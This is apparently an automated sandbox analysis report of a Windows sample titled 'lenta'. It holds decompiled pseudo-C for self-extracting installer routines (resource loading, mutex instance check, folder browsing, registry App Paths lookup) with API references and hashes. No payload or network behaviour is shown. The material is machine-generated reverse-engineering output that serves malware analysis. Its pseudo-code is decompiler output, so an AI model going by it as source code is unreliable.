                            0x00eb2d69
                            0x00eb2d6e
                            0x00eb2f06
                            0x00eb2f06
                            0x00eb2f06
                            0x00eb2d59
                            0x00eb2f18

                            APIs
                            • memset.MSVCRT ref: 00EB2CD9
                            • memset.MSVCRT ref: 00EB2CE9
                            • memset.MSVCRT ref: 00EB2CF9
                              • Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46A0
                              • Part of subcall function 00EB468F: SizeofResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46A9
                              • Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46C3
                              • Part of subcall function 00EB468F: LoadResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46CC
                              • Part of subcall function 00EB468F: LockResource.KERNEL32(00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46D3
                              • Part of subcall function 00EB468F: memcpy_s.MSVCRT ref: 00EB46E5
                              • Part of subcall function 00EB468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46EF
                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB2D34
                            • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB2D40
                            • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB2DAE
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00EB2DBD
                            • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB2E0A
                              • Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
                              • Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                            • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                            • API String ID: 1002816675-2993962200
                            • Opcode ID: 469b8ec4ade6959c19e9679650f1e9c07f37329b1af091d7c62b8c0f56cbd5ca
                            • Instruction ID: ec5ff9c6744d4a3e9ecb23ccec68795f8336d4cbdb28154f47b3ccf5367447a6
                            • Opcode Fuzzy Hash: 469b8ec4ade6959c19e9679650f1e9c07f37329b1af091d7c62b8c0f56cbd5ca
                            • Instruction Fuzzy Hash: 4C51F3703003016EEB62AB669D4ABFB369CDF85704F04613DFB81F92E2DAB4C845D621
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 81%
                            			E00EB34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                            				void* _t9;
                            				void* _t12;
                            				void* _t13;
                            				void* _t17;
                            				void* _t23;
                            				void* _t25;
                            				struct HWND__* _t35;
                            				struct HWND__* _t38;
                            				void* _t39;
                            
                            				_t9 = _a8 - 0x10;
                            				if(_t9 == 0) {
                            					__eflags = 1;
                            					L19:
                            					_push(0);
                            					 *0xeb91d8 = 1;
                            					L20:
                            					_push(_a4);
                            					L21:
                            					EndDialog();
                            					L22:
                            					return 1;
                            				}
                            				_push(1);
                            				_pop(1);
                            				_t12 = _t9 - 0xf2;
                            				if(_t12 == 0) {
                            					__eflags = _a12 - 0x1b;
                            					if(_a12 != 0x1b) {
                            						goto L22;
                            					}
                            					goto L19;
                            				}
                            				_t13 = _t12 - 0xe;
                            				if(_t13 == 0) {
                            					_t35 = _a4;
                            					 *0xeb8584 = _t35;
                            					E00EB43D0(_t35, GetDesktopWindow());
                            					__eflags =  *0xeb8184; // 0x1
                            					if(__eflags != 0) {
                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                            					}
                            					SetWindowTextA(_t35, "lenta");
                            					_t17 = CreateThread(0, 0, E00EB4FE0, 0, 0, 0xeb8798);
                            					 *0xeb879c = _t17;
                            					__eflags = _t17;
                            					if(_t17 != 0) {
                            						goto L22;
                            					} else {
                            						E00EB44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                            						_push(0);
                            						_push(_t35);
                            						goto L21;
                            					}
                            				}
                            				_t23 = _t13 - 1;
                            				if(_t23 == 0) {
                            					__eflags = _a12 - 2;
                            					if(_a12 != 2) {
                            						goto L22;
                            					}
                            					ResetEvent( *0xeb858c);
                            					_t38 =  *0xeb8584; // 0x0
                            					_t25 = E00EB44B9(_t38, 0x4b2, 0xeb1140, 0, 0x20, 4);
                            					__eflags = _t25 - 6;
                            					if(_t25 == 6) {
                            						L11:
                            						 *0xeb91d8 = 1;
                            						SetEvent( *0xeb858c);
                            						_t39 =  *0xeb879c; // 0x0
                            						E00EB3680(_t39);
                            						_push(0);
                            						goto L20;
                            					}
                            					__eflags = _t25 - 1;
                            					if(_t25 == 1) {
                            						goto L11;
                            					}
                            					SetEvent( *0xeb858c);
                            					goto L22;
                            				}
                            				if(_t23 == 0xe90) {
                            					TerminateThread( *0xeb879c, 0);
                            					EndDialog(_a4, _a12);
                            					return 1;
                            				}
                            				return 0;
                            			}












                            0x00eb34fb
                            0x00eb34fe
                            0x00eb3665
                            0x00eb3666
                            0x00eb3666
                            0x00eb3668
                            0x00eb366e
                            0x00eb366e
                            0x00eb3671
                            0x00eb3671
                            0x00eb3677
                            0x00000000
                            0x00eb3677
                            0x00eb3504
                            0x00eb3506
                            0x00eb3507
                            0x00eb350c
                            0x00eb365b
                            0x00eb365f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb3661
                            0x00eb3512
                            0x00eb3515
                            0x00eb35be
                            0x00eb35c1
                            0x00eb35d1
                            0x00eb35d8
                            0x00eb35de
                            0x00eb35f8
                            0x00eb3617
                            0x00eb3617
                            0x00eb3623
                            0x00eb3637
                            0x00eb363d
                            0x00eb3642
                            0x00eb3644
                            0x00000000
                            0x00eb3646
                            0x00eb3652
                            0x00eb3657
                            0x00eb3658
                            0x00000000
                            0x00eb3658
                            0x00eb3644
                            0x00eb351b
                            0x00eb351d
                            0x00eb354f
                            0x00eb3553
                            0x00000000
                            0x00000000
                            0x00eb355f
                            0x00eb3565
                            0x00eb357c
                            0x00eb3581
                            0x00eb3584
                            0x00eb359b
                            0x00eb35a1
                            0x00eb35a7
                            0x00eb35ad
                            0x00eb35b3
                            0x00eb35b8
                            0x00000000
                            0x00eb35b8
                            0x00eb3586
                            0x00eb3588
                            0x00000000
                            0x00000000
                            0x00eb3590
                            0x00000000
                            0x00eb3590
                            0x00eb3524
                            0x00eb3535
                            0x00eb3541
                            0x00000000
                            0x00eb3549
                            0x00000000

                            APIs
                            • TerminateThread.KERNEL32(00000000), ref: 00EB3535
                            • EndDialog.USER32(?,?), ref: 00EB3541
                            • ResetEvent.KERNEL32 ref: 00EB355F
                            • SetEvent.KERNEL32(00EB1140,00000000,00000020,00000004), ref: 00EB3590
                            • GetDesktopWindow.USER32 ref: 00EB35C7
                            • GetDlgItem.USER32(?,0000083B), ref: 00EB35F1
                            • SendMessageA.USER32(00000000), ref: 00EB35F8
                            • GetDlgItem.USER32(?,0000083B), ref: 00EB3610
                            • SendMessageA.USER32(00000000), ref: 00EB3617
                            • SetWindowTextA.USER32(?,lenta), ref: 00EB3623
                            • CreateThread.KERNEL32 ref: 00EB3637
                            • EndDialog.USER32(?,00000000), ref: 00EB3671
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                            • String ID: lenta
                            • API String ID: 2406144884-2780258678
                            • Opcode ID: 127aa7d57fe6662ac893a7642a9dd90ca28210a4d5d78b0916b80fcb5d1fa050
                            • Instruction ID: 67c5c65905e97a87c563c56bdf6c20f933d25a60b49139c622d16130acc99beb
                            • Opcode Fuzzy Hash: 127aa7d57fe6662ac893a7642a9dd90ca28210a4d5d78b0916b80fcb5d1fa050
                            • Instruction Fuzzy Hash: 5431A0B0241301BFDB205F3AAD0EEAB3B69E785B04F146629F602B52B5CE718904CA51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E00EB4224(char __ecx) {
                            				char* _v8;
                            				_Unknown_base(*)()* _v12;
                            				_Unknown_base(*)()* _v16;
                            				_Unknown_base(*)()* _v20;
                            				char* _v28;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				intOrPtr _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				_Unknown_base(*)()* _t26;
                            				_Unknown_base(*)()* _t28;
                            				_Unknown_base(*)()* _t29;
                            				_Unknown_base(*)()* _t32;
                            				char _t42;
                            				char* _t44;
                            				char* _t61;
                            				void* _t63;
                            				char* _t65;
                            				struct HINSTANCE__* _t66;
                            				char _t67;
                            				void* _t71;
                            				char _t76;
                            				intOrPtr _t85;
                            
                            				_t67 = __ecx;
                            				_t66 = LoadLibraryA("SHELL32.DLL");
                            				if(_t66 == 0) {
                            					_t63 = 0x4c2;
                            					L22:
                            					E00EB44B9(_t67, _t63, 0, 0, 0x10, 0);
                            					return 0;
                            				}
                            				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                            				_v12 = _t26;
                            				if(_t26 == 0) {
                            					L20:
                            					FreeLibrary(_t66);
                            					_t63 = 0x4c1;
                            					goto L22;
                            				}
                            				_t28 = GetProcAddress(_t66, 0xc3);
                            				_v20 = _t28;
                            				if(_t28 == 0) {
                            					goto L20;
                            				}
                            				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                            				_v16 = _t29;
                            				if(_t29 == 0) {
                            					goto L20;
                            				}
                            				_t76 =  *0xeb88c0; // 0x0
                            				if(_t76 != 0) {
                            					L10:
                            					 *0xeb87a0 = 0;
                            					_v52 = _t67;
                            					_v48 = 0;
                            					_v44 = 0;
                            					_v40 = 0xeb8598;
                            					_v36 = 1;
                            					_v32 = E00EB4200;
                            					_v28 = 0xeb88c0;
                            					 *0xeba288( &_v52);
                            					_t32 =  *_v12();
                            					if(_t71 != _t71) {
                            						asm("int 0x29");
                            					}
                            					_v12 = _t32;
                            					if(_t32 != 0) {
                            						 *0xeba288(_t32, 0xeb88c0);
                            						 *_v16();
                            						if(_t71 != _t71) {
                            							asm("int 0x29");
                            						}
                            						if( *0xeb88c0 != 0) {
                            							E00EB1680(0xeb87a0, 0x104, 0xeb88c0);
                            						}
                            						 *0xeba288(_v12);
                            						 *_v20();
                            						if(_t71 != _t71) {
                            							asm("int 0x29");
                            						}
                            					}
                            					FreeLibrary(_t66);
                            					_t85 =  *0xeb87a0; // 0x0
                            					return 0 | _t85 != 0x00000000;
                            				} else {
                            					GetTempPathA(0x104, 0xeb88c0);
                            					_t61 = 0xeb88c0;
                            					_t4 =  &(_t61[1]); // 0xeb88c1
                            					_t65 = _t4;
                            					do {
                            						_t42 =  *_t61;
                            						_t61 =  &(_t61[1]);
                            					} while (_t42 != 0);
                            					_t5 = _t61 - _t65 + 0xeb88c0; // 0x1d71181
                            					_t44 = CharPrevA(0xeb88c0, _t5);
                            					_v8 = _t44;
                            					if( *_t44 == 0x5c &&  *(CharPrevA(0xeb88c0, _t44)) != 0x3a) {
                            						 *_v8 = 0;
                            					}
                            					goto L10;
                            				}
                            			}




























                            0x00eb4234
                            0x00eb423c
                            0x00eb4240
                            0x00eb43b2
                            0x00eb43b7
                            0x00eb43c0
                            0x00000000
                            0x00eb43c5
                            0x00eb424c
                            0x00eb4252
                            0x00eb4257
                            0x00eb43a4
                            0x00eb43a5
                            0x00eb43ab
                            0x00000000
                            0x00eb43ab
                            0x00eb4263
                            0x00eb4269
                            0x00eb426e
                            0x00000000
                            0x00000000
                            0x00eb427a
                            0x00eb4280
                            0x00eb4285
                            0x00000000
                            0x00000000
                            0x00eb428d
                            0x00eb4293
                            0x00eb42e6
                            0x00eb42e9
                            0x00eb42ef
                            0x00eb42f4
                            0x00eb42f7
                            0x00eb4300
                            0x00eb4307
                            0x00eb430e
                            0x00eb4315
                            0x00eb431c
                            0x00eb4322
                            0x00eb4326
                            0x00eb432d
                            0x00eb432d
                            0x00eb432f
                            0x00eb4334
                            0x00eb4343
                            0x00eb4349
                            0x00eb434d
                            0x00eb4354
                            0x00eb4354
                            0x00eb435d
                            0x00eb436e
                            0x00eb436e
                            0x00eb437d
                            0x00eb4383
                            0x00eb4387
                            0x00eb438e
                            0x00eb438e
                            0x00eb4387
                            0x00eb4391
                            0x00eb4399
                            0x00000000
                            0x00eb4295
                            0x00eb429f
                            0x00eb42a5
                            0x00eb42aa
                            0x00eb42aa
                            0x00eb42ad
                            0x00eb42ad
                            0x00eb42af
                            0x00eb42b0
                            0x00eb42b6
                            0x00eb42c2
                            0x00eb42c8
                            0x00eb42ce
                            0x00eb42e4
                            0x00eb42e4
                            0x00000000
                            0x00eb42ce

                            APIs
                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00EB4236
                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00EB424C
                            • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00EB4263
                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00EB427A
                            • GetTempPathA.KERNEL32(00000104,00EB88C0,?,00000001), ref: 00EB429F
                            • CharPrevA.USER32(00EB88C0,01D71181,?,00000001), ref: 00EB42C2
                            • CharPrevA.USER32(00EB88C0,00000000,?,00000001), ref: 00EB42D6
                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00EB4391
                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00EB43A5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                            • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                            • API String ID: 1865808269-1731843650
                            • Opcode ID: 4dc9b95b0970a89790c82c37fda95e0bba46400b9ea8314726169cf45dbf8cc9
                            • Instruction ID: bba5fc3c86f7afd694f8c6d8e73a6557da8c37f9603a0b6e27ebda6258537b9f
                            • Opcode Fuzzy Hash: 4dc9b95b0970a89790c82c37fda95e0bba46400b9ea8314726169cf45dbf8cc9
                            • Instruction Fuzzy Hash: 1741E6B4A00314AFDB11AF65DD95AEF7BF8EB45348F481269E941B3392CB748C05CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E00EB44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                            				signed int _v8;
                            				char _v64;
                            				char _v576;
                            				void* _v580;
                            				struct HWND__* _v584;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t34;
                            				void* _t37;
                            				signed int _t39;
                            				intOrPtr _t43;
                            				signed int _t44;
                            				signed int _t49;
                            				signed int _t52;
                            				void* _t54;
                            				intOrPtr _t55;
                            				intOrPtr _t58;
                            				intOrPtr _t59;
                            				int _t64;
                            				void* _t66;
                            				intOrPtr* _t67;
                            				signed int _t69;
                            				intOrPtr* _t73;
                            				intOrPtr* _t76;
                            				intOrPtr* _t77;
                            				void* _t80;
                            				void* _t81;
                            				void* _t82;
                            				intOrPtr* _t84;
                            				void* _t85;
                            				signed int _t89;
                            
                            				_t75 = __edx;
                            				_t34 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t34 ^ _t89;
                            				_v584 = __ecx;
                            				_t83 = "LoadString() Error.  Could not load string resource.";
                            				_t67 = _a4;
                            				_t69 = 0xd;
                            				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                            				_t80 = _t83 + _t69 + _t69;
                            				_v580 = _t37;
                            				asm("movsb");
                            				if(( *0xeb8a38 & 0x00000001) != 0) {
                            					_t39 = 1;
                            				} else {
                            					_v576 = 0;
                            					LoadStringA( *0xeb9a3c, _t75,  &_v576, 0x200);
                            					if(_v576 != 0) {
                            						_t73 =  &_v576;
                            						_t16 = _t73 + 1; // 0x1
                            						_t75 = _t16;
                            						do {
                            							_t43 =  *_t73;
                            							_t73 = _t73 + 1;
                            						} while (_t43 != 0);
                            						_t84 = _v580;
                            						_t74 = _t73 - _t75;
                            						if(_t84 == 0) {
                            							if(_t67 == 0) {
                            								_t27 = _t74 + 1; // 0x2
                            								_t83 = _t27;
                            								_t44 = LocalAlloc(0x40, _t83);
                            								_t80 = _t44;
                            								if(_t80 == 0) {
                            									goto L6;
                            								} else {
                            									_t75 = _t83;
                            									_t74 = _t80;
                            									E00EB1680(_t80, _t83,  &_v576);
                            									goto L23;
                            								}
                            							} else {
                            								_t76 = _t67;
                            								_t24 = _t76 + 1; // 0x1
                            								_t85 = _t24;
                            								do {
                            									_t55 =  *_t76;
                            									_t76 = _t76 + 1;
                            								} while (_t55 != 0);
                            								_t25 = _t76 - _t85 + 0x64; // 0x65
                            								_t83 = _t25 + _t74;
                            								_t44 = LocalAlloc(0x40, _t25 + _t74);
                            								_t80 = _t44;
                            								if(_t80 == 0) {
                            									goto L6;
                            								} else {
                            									E00EB171E(_t80, _t83,  &_v576, _t67);
                            									goto L23;
                            								}
                            							}
                            						} else {
                            							_t77 = _t67;
                            							_t18 = _t77 + 1; // 0x1
                            							_t81 = _t18;
                            							do {
                            								_t58 =  *_t77;
                            								_t77 = _t77 + 1;
                            							} while (_t58 != 0);
                            							_t75 = _t77 - _t81;
                            							_t82 = _t84 + 1;
                            							do {
                            								_t59 =  *_t84;
                            								_t84 = _t84 + 1;
                            							} while (_t59 != 0);
                            							_t21 = _t74 + 0x64; // 0x65
                            							_t83 = _t21 + _t84 - _t82 + _t75;
                            							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                            							_t80 = _t44;
                            							if(_t80 == 0) {
                            								goto L6;
                            							} else {
                            								_push(_v580);
                            								E00EB171E(_t80, _t83,  &_v576, _t67);
                            								L23:
                            								MessageBeep(_a12);
                            								if(E00EB681F(_t67) == 0) {
                            									L25:
                            									_t49 = 0x10000;
                            								} else {
                            									_t54 = E00EB67C9(_t74, _t74);
                            									_t49 = 0x190000;
                            									if(_t54 == 0) {
                            										goto L25;
                            									}
                            								}
                            								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                            								_t83 = _t52;
                            								LocalFree(_t80);
                            								_t39 = _t52;
                            							}
                            						}
                            					} else {
                            						if(E00EB681F(_t67) == 0) {
                            							L4:
                            							_t64 = 0x10010;
                            						} else {
                            							_t66 = E00EB67C9(0, 0);
                            							_t64 = 0x190010;
                            							if(_t66 == 0) {
                            								goto L4;
                            							}
                            						}
                            						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                            						L6:
                            						_t39 = _t44 | 0xffffffff;
                            					}
                            				}
                            				return E00EB6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                            			}



































                            0x00eb44b9
                            0x00eb44c4
                            0x00eb44cb
                            0x00eb44d8
                            0x00eb44e4
                            0x00eb44eb
                            0x00eb44ee
                            0x00eb44ef
                            0x00eb44ef
                            0x00eb44f1
                            0x00eb44f7
                            0x00eb44f8
                            0x00eb467b
                            0x00eb44fe
                            0x00eb4509
                            0x00eb4518
                            0x00eb4525
                            0x00eb4562
                            0x00eb4568
                            0x00eb4568
                            0x00eb456b
                            0x00eb456b
                            0x00eb456d
                            0x00eb456e
                            0x00eb4572
                            0x00eb4578
                            0x00eb457c
                            0x00eb45cb
                            0x00eb4607
                            0x00eb4607
                            0x00eb460d
                            0x00eb4613
                            0x00eb4617
                            0x00000000
                            0x00eb461d
                            0x00eb4623
                            0x00eb4626
                            0x00eb4628
                            0x00000000
                            0x00eb4628
                            0x00eb45cd
                            0x00eb45cd
                            0x00eb45cf
                            0x00eb45cf
                            0x00eb45d2
                            0x00eb45d2
                            0x00eb45d4
                            0x00eb45d5
                            0x00eb45db
                            0x00eb45de
                            0x00eb45e3
                            0x00eb45e9
                            0x00eb45ed
                            0x00000000
                            0x00eb45f3
                            0x00eb45fd
                            0x00000000
                            0x00eb4602
                            0x00eb45ed
                            0x00eb457e
                            0x00eb457e
                            0x00eb4580
                            0x00eb4580
                            0x00eb4583
                            0x00eb4583
                            0x00eb4585
                            0x00eb4586
                            0x00eb458a
                            0x00eb458c
                            0x00eb458f
                            0x00eb458f
                            0x00eb4591
                            0x00eb4592
                            0x00eb459b
                            0x00eb459e
                            0x00eb45a3
                            0x00eb45a9
                            0x00eb45ad
                            0x00000000
                            0x00eb45af
                            0x00eb45af
                            0x00eb45bf
                            0x00eb462d
                            0x00eb4630
                            0x00eb463d
                            0x00eb464e
                            0x00eb464e
                            0x00eb463f
                            0x00eb4640
                            0x00eb4647
                            0x00eb464c
                            0x00000000
                            0x00000000
                            0x00eb464c
                            0x00eb4666
                            0x00eb466d
                            0x00eb466f
                            0x00eb4675
                            0x00eb4675
                            0x00eb45ad
                            0x00eb4527
                            0x00eb452e
                            0x00eb453f
                            0x00eb453f
                            0x00eb4530
                            0x00eb4531
                            0x00eb4538
                            0x00eb453d
                            0x00000000
                            0x00000000
                            0x00eb453d
                            0x00eb4554
                            0x00eb455a
                            0x00eb455a
                            0x00eb455a
                            0x00eb4525
                            0x00eb468c

                            APIs
                            • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
                            • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554
                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 00EB45A3
                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 00EB45E3
                            • LocalAlloc.KERNEL32(00000040,00000002), ref: 00EB460D
                            • MessageBeep.USER32(00000000), ref: 00EB4630
                            • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00EB4666
                            • LocalFree.KERNEL32(00000000), ref: 00EB466F
                              • Part of subcall function 00EB681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00EB686E
                              • Part of subcall function 00EB681F: GetSystemMetrics.USER32(0000004A), ref: 00EB68A7
                              • Part of subcall function 00EB681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00EB68CC
                              • Part of subcall function 00EB681F: RegQueryValueExA.ADVAPI32(?,00EB1140,00000000,?,?,0000000C), ref: 00EB68F4
                              • Part of subcall function 00EB681F: RegCloseKey.ADVAPI32(?), ref: 00EB6902
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                            • String ID: LoadString() Error. Could not load string resource.$lenta
                            • API String ID: 3244514340-1000497449
                            • Opcode ID: fabd7ed6b947336effcb8c66b60b3b3b8a55f01d7db12db72a45c569e94ba4f2
                            • Instruction ID: fc000acf9c0d457e8dd295fd01e90655f8760019bc1f2a6c496b448a51296e70
                            • Opcode Fuzzy Hash: fabd7ed6b947336effcb8c66b60b3b3b8a55f01d7db12db72a45c569e94ba4f2
                            • Instruction Fuzzy Hash: D451E3B2901219AFDB219F28DC48BEB7BA9EF45304F0451A5FD49B7286DB319E09CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E00EB2773(CHAR* __ecx, char* _a4) {
                            				signed int _v8;
                            				char _v268;
                            				char _v269;
                            				CHAR* _v276;
                            				int _v280;
                            				void* _v284;
                            				int _v288;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t23;
                            				intOrPtr _t34;
                            				int _t45;
                            				int* _t50;
                            				CHAR* _t52;
                            				CHAR* _t61;
                            				char* _t62;
                            				int _t63;
                            				CHAR* _t64;
                            				signed int _t65;
                            
                            				_t52 = __ecx;
                            				_t23 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t23 ^ _t65;
                            				_t62 = _a4;
                            				_t50 = 0;
                            				_t61 = __ecx;
                            				_v276 = _t62;
                            				 *((char*)(__ecx)) = 0;
                            				if( *_t62 != 0x23) {
                            					_t63 = 0x104;
                            					goto L14;
                            				} else {
                            					_t64 = _t62 + 1;
                            					_v269 = CharUpperA( *_t64);
                            					_v276 = CharNextA(CharNextA(_t64));
                            					_t63 = 0x104;
                            					_t34 = _v269;
                            					if(_t34 == 0x53) {
                            						L14:
                            						GetSystemDirectoryA(_t61, _t63);
                            						goto L15;
                            					} else {
                            						if(_t34 == 0x57) {
                            							GetWindowsDirectoryA(_t61, 0x104);
                            							goto L16;
                            						} else {
                            							_push(_t52);
                            							_v288 = 0x104;
                            							E00EB1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                            							_t59 = 0x104;
                            							E00EB658A( &_v268, 0x104, _v276);
                            							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                            								L16:
                            								_t59 = _t63;
                            								E00EB658A(_t61, _t63, _v276);
                            							} else {
                            								if(RegQueryValueExA(_v284, 0xeb1140, 0,  &_v280, _t61,  &_v288) == 0) {
                            									_t45 = _v280;
                            									if(_t45 != 2) {
                            										L9:
                            										if(_t45 == 1) {
                            											goto L10;
                            										}
                            									} else {
                            										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                            											_t45 = _v280;
                            											goto L9;
                            										} else {
                            											_t59 = 0x104;
                            											E00EB1680(_t61, 0x104,  &_v268);
                            											L10:
                            											_t50 = 1;
                            										}
                            									}
                            								}
                            								RegCloseKey(_v284);
                            								L15:
                            								if(_t50 == 0) {
                            									goto L16;
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return E00EB6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                            			}























                            0x00eb2773
                            0x00eb277e
                            0x00eb2785
                            0x00eb278a
                            0x00eb278d
                            0x00eb2790
                            0x00eb2792
                            0x00eb2798
                            0x00eb279d
                            0x00eb28b2
                            0x00000000
                            0x00eb27a3
                            0x00eb27a3
                            0x00eb27af
                            0x00eb27c2
                            0x00eb27c8
                            0x00eb27cd
                            0x00eb27d5
                            0x00eb28b7
                            0x00eb28b9
                            0x00000000
                            0x00eb27db
                            0x00eb27dd
                            0x00eb28aa
                            0x00000000
                            0x00eb27e3
                            0x00eb27e3
                            0x00eb27ec
                            0x00eb27f8
                            0x00eb2803
                            0x00eb280b
                            0x00eb2831
                            0x00eb28c3
                            0x00eb28c9
                            0x00eb28cd
                            0x00eb2837
                            0x00eb285a
                            0x00eb285c
                            0x00eb2865
                            0x00eb2892
                            0x00eb2895
                            0x00000000
                            0x00000000
                            0x00eb2867
                            0x00eb2878
                            0x00eb288c
                            0x00000000
                            0x00eb287a
                            0x00eb2880
                            0x00eb2885
                            0x00eb2897
                            0x00eb2899
                            0x00eb2899
                            0x00eb2878
                            0x00eb2865
                            0x00eb28a0
                            0x00eb28bf
                            0x00eb28c1
